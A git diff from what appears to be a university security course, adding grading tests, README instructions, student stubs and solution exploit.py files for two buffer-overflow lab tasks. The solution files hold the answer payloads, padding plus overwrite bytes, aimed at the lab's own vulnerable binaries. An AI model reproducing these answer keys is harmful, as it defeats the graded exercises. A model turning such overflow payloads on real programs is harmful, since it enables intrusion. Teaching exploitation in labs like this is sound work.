cs-pub-ro · teodutu · May 11, 2025 · Mar 2, 2025
diff --git a/labs/lab-10/tasks/overflow-for-binary/README.md b/labs/lab-10/tasks/overflow-for-binary/README.md
@@ -21,6 +21,21 @@ If you're having difficulties solving this exercise, go through [this](../../rea
 
 > **WARNING** If you try using a payload generated with python and it doesn't work, try simply copying its content in the terminal
 
+## Checking Your Solution
+
+In order to verify your exploit, please complete the `exploit.py` TODOs.
+Run it with `python3 exploit.py`.
+
+Afterwards, navigate to the `tests` directory and run:
+
+```Bash
+make check
+test........................................passed
+Total:                                      100/100
+```
+
+If your solution is correct, you will receive a `100/100` result.
+
 ## Resources
 
 If you found the laboratory interesting in a positive way, you can learn more about this type of attack, as well as cybersecurity in general, on this [channel](https://www.youtube.com/c/LiveOverflow).
diff --git a/labs/lab-10/tasks/overflow-for-binary/solution/exploit.py b/labs/lab-10/tasks/overflow-for-binary/solution/exploit.py
@@ -0,0 +1,11 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    argument = 32 * "A" + "\x50\x52\x30\x4e"
+    subprocess.run(["./overflow_in_binary", argument])
+
+
+if __name__ == "__main__":
+    run_executable()
diff --git a/labs/lab-10/tasks/overflow-for-binary/support/exploit.py b/labs/lab-10/tasks/overflow-for-binary/support/exploit.py
@@ -0,0 +1,11 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    argument = ""  # TODO: Put here the payload you have discovered
+    subprocess.run(["./overflow_in_binary", argument])
+
+
+if __name__ == "__main__":
+    run_executable()
diff --git a/labs/lab-10/tasks/overflow-for-binary/support/overflow_in_binary b/labs/lab-10/tasks/overflow-for-binary/support/overflow_in_binary
diff --git a/labs/lab-10/tasks/overflow-for-binary/tests/Makefile b/labs/lab-10/tasks/overflow-for-binary/tests/Makefile
@@ -0,0 +1,6 @@
+# SPDX-License-Identifier: BSD-3-Clause
+
+check:
+	./run_all_tests.sh
+
+.PHONY: check
diff --git a/labs/lab-10/tasks/overflow-for-binary/tests/graded_test.inc.sh b/labs/lab-10/tasks/overflow-for-binary/tests/graded_test.inc.sh
@@ -0,0 +1,30 @@
+#!/bin/bash
+# SPDX-License-Identifier: BSD-3-Clause
+
+print_test()
+{
+	desc="$1"
+	res="$2"
+
+	dots="........................................"
+
+	printf "%-12.12s%s"   "$desc" "$dots"
+
+	if [ "$res" -eq 1 ]; then
+		printf "passed"
+	else
+		printf "failed"
+	fi
+
+	printf "\n"
+}
+
+run_test()
+{
+	func="$1"
+
+	( eval "$func" )
+	ret=$?
+
+	print_test "$func" "$ret"
+}
diff --git a/labs/lab-10/tasks/overflow-for-binary/tests/run_all_tests.sh b/labs/lab-10/tasks/overflow-for-binary/tests/run_all_tests.sh
@@ -0,0 +1,20 @@
+#!/bin/bash
+# SPDX-License-Identifier: BSD-3-Clause
+
+echo ""
+(
+  bash test.sh
+) | tee results.txt
+echo ""
+
+if tail -n 1 results.txt | grep -q 'passed$'; then
+		total=100
+else
+		total=0
+fi
+
+echo -n "Total:      "
+echo -n "                                "
+LC_ALL=C printf "%3d/100\n" "$total"
+
+rm results.txt
diff --git a/labs/lab-10/tasks/overflow-for-binary/tests/test.sh b/labs/lab-10/tasks/overflow-for-binary/tests/test.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# SPDX-License-Identifier: BSD-3-Clause
+# shellcheck disable=SC1091
+
+source ./graded_test.inc.sh
+
+test_exploit() {
+	if ( cd ../support && python3 exploit.py | grep -q "Great success!" ); then
+		return 1
+	else
+		return 0
+	fi
+}
+
+run_test test_exploit
diff --git a/labs/lab-10/tasks/overflow-in-c/README.md b/labs/lab-10/tasks/overflow-in-c/README.md
@@ -96,4 +96,17 @@ Not quite there. Try again!
 Aborted (core dumped)
 ```
 
+## Checking Your Solution
+
+In order to verify your exploit, please complete the `exploit.py` TODOs.
+Afterwards, navigate to the `tests` directory and run:
+
+```Bash
+make check
+test........................................passed
+Total:                                      100/100
+```
+
+If your solution is correct, you will receive a `100/100` result.
+
 If you're having difficulties solving this exercise, go through [this](../../reading/overflow-vuln.md) reading material.
diff --git a/labs/lab-10/tasks/overflow-in-c/solution/exploit.py b/labs/lab-10/tasks/overflow-in-c/solution/exploit.py
@@ -0,0 +1,11 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    payload = 73 * "A" + "\x4d\x49\x41\x55"
+    subprocess.run(["../support/do_overflow"], input=payload, universal_newlines=True)
+
+
+if __name__ == "__main__":
+    run_executable()
diff --git a/labs/lab-10/tasks/overflow-in-c/support/do_overflow.asm b/labs/lab-10/tasks/overflow-in-c/support/do_overflow.asm
diff --git a/labs/lab-10/tasks/overflow-in-c/support/exploit.py b/labs/lab-10/tasks/overflow-in-c/support/exploit.py
@@ -0,0 +1,11 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    payload = ""  # TODO: Put here the payload you have discovered
+    subprocess.run(["../support/do_overflow"], input=payload, universal_newlines=True)
+
+
+if __name__ == "__main__":
+    run_executable()
diff --git a/labs/lab-10/tasks/overflow-in-c/tests/Makefile b/labs/lab-10/tasks/overflow-in-c/tests/Makefile
@@ -0,0 +1,24 @@
+CC     = gcc
+CFLAGS = -Wall -Wextra -O2
+TARGET = test_overflow_in_C
+
+SRCS = test_overflow_in_C.c graded_test.c
+
+OBJS = $(SRCS:.c=.o)
+
+all: $(TARGET)
+
+$(TARGET): $(OBJS)
+	$(CC) $(CFLAGS) $(OBJS) -o $@
+
+%.o: %.c
+	$(CC) $(CFLAGS) -c $< -o $@
+
+clean:
+	rm -f $(TARGET) $(OBJS)
+
+check: all
+	./run_all_tests.sh
+	$(MAKE) clean
+
+.PHONY: all clean test
diff --git a/labs/lab-10/tasks/overflow-in-c/tests/graded_test.c b/labs/lab-10/tasks/overflow-in-c/tests/graded_test.c
@@ -0,0 +1,72 @@
+// SPDX-License-Identifier: BSD-3-Clause
+
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/param.h>
+
+#include "./graded_test.h"
+
+/*
+ * Print test result. Printed message should fit in 72 characters.
+ *
+ * Print format is:
+ *
+ * description ...................... passed ... NNN
+ * description ...................... failed ... NNN
+ *   32 chars        24 chars           6     3   3
+ */
+
+static void print_test(const char *description, int result)
+{
+	/* Make these global linkage, so it's only allocated once. */
+	static char print_buffer[74];
+	static const char failed[] = "failed";
+	static const char passed[] = "passed";
+	size_t i;
+	size_t len;
+
+	/* Collect description in print_buffer. */
+	len = MIN(strlen(description), 32);
+	for (i = 0; i < len; i++)
+		print_buffer[i] = description[i];
+
+	/* Collect dots in print_buffer. */
+	for (i = 0; i < 40; i++)
+		print_buffer[12+i] = '.';
+
+	/* Collect passed / failed. */
+	for (i = 0; i < 6; i++) {
+		if (result == 1)
+			print_buffer[52+i] = passed[i];
+		else
+			print_buffer[52+i] = failed[i];
+	}
+
+	/* Collect newline. */
+	print_buffer[59] = '\n';
+
+	int ret = write(1, print_buffer, 58);
+
+	if (ret == -1)
+		return;
+}
+
+void run_test(struct graded_test *test)
+{
+	int res;
+
+	res = test->function();
+	print_test(test->description, res);
+#ifdef EXIT_IF_FAIL
+	exit(EXIT_FAILURE);
+#endif
+}
+
+void run_tests(struct graded_test *tests, size_t count)
+{
+	size_t i;
+
+	for (i = 0; i < count; i++)
+		run_test(&tests[i]);
+}
diff --git a/labs/lab-10/tasks/overflow-in-c/tests/graded_test.h b/labs/lab-10/tasks/overflow-in-c/tests/graded_test.h
@@ -0,0 +1,20 @@
+/* SPDX-License-Identifier: BSD-3-Clause */
+
+#include <stddef.h>
+
+#ifndef GRADED_TEST_H_
+#define GRADED_TEST_H_	1
+
+/* test function prototype */
+typedef int (*test_f)(void);
+
+struct graded_test {
+	test_f function;		/* test/evaluation function */
+	char *description;		/* test description */
+	size_t points;			/* points for each test */
+};
+
+void run_test(struct graded_test *test);
+void run_tests(struct graded_test *tests, size_t count);
+
+#endif /* GRADED_TEST_H_ */